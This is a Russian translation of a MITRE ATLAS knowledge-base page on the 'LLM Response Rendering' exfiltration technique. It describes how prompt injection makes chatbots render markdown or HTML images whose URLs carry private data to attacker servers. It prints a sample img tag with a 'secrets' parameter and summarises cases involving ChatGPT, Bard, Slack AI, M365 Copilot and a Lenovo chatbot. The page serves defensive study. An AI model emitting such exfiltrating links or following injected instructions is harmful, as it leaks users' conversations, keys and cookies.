Рендеринг ответа LLM
Оригинал: LLM Response Rendering
Злоумышленник может добиться того, чтобы большая языковая модель (LLM) вернула приватную информацию, скрытую от пользователя при рендеринге ответа клиентом пользователя. Затем эта приватная информация эксфильтруется. Это может происходить в виде отрендеренных изображений, которые автоматически отправляют запрос на сервер, контролируемый злоумышленником.
Злоумышленник заставляет ИИ показать пользователю изображение, которое клиентское приложение пользователя рендерит без каких-либо действий со стороны пользователя. Изображение размещается на сайте, контролируемом злоумышленником, что позволяет ему эксфильтровать данные через параметры запроса к изображению. Варианты включают HTML-теги и markdown.
Например, LLM может сгенерировать следующий markdown:

Клиент отрендерит его как:
<img src="https://atlas.mitre.org/image.png?secrets="private data">
Когда запрос поступает на сервер злоумышленника, где размещено запрошенное изображение, злоумышленник получает содержимое параметра запроса secrets.
Тактики
Примеры процедур из кейсов
ChatGPT автоматически отображает изображение пользователю, из-за чего отправляет запрос на сервер злоумышленника и передает туда разговор пользователя.
AML.CS0029Эксфильтрация разговоров Google BardBard автоматически отображает Markdown-разметку, отправляя запрос к Google Apps Script и тем самым эксфильтруя разговор пользователя. Content Security Policy Bard разрешает такой запрос, потому что URL размещен на домене, принадлежащем Google.
AML.CS0035Эксфильтрация данных из Slack AI через косвенную промпт-инъекциюВ соответствии с вредоносными инструкциями ответ отображается как ссылка для перехода, в URL которой закодирован API-ключ жертвы. Фрагмент ответа: Жертву вводят в заблуждение: она думает, что должна нажать на ссылку для повторной аутентификации, после чего ее API-ключ отправляется на сервер под контролем злоумышленника.
AML.CS0059EchoLeak: промпт-инъекция нулевого клика против M365 Copilot для эксфильтрации данныхCopilot отобразил изображение Markdown, URL которого кодировал конфиденциальную информацию. Клиент автоматически попытался загрузить изображение, создав путь эксфильтрации без клика.
AML.CS0060Межсайтовый скриптинг (XSS) через манипуляцию промптом в ИИ-чат-боте LenovoАктивный cookie сеанса добавлялся в параметр запроса тега изображения в HTML-нагрузке. Изображение не существовало, однако неудачная загрузка изображения все равно отправляла запрос на сервер, подконтрольный злоумышленнику, эксфильтруя cookie сеанса.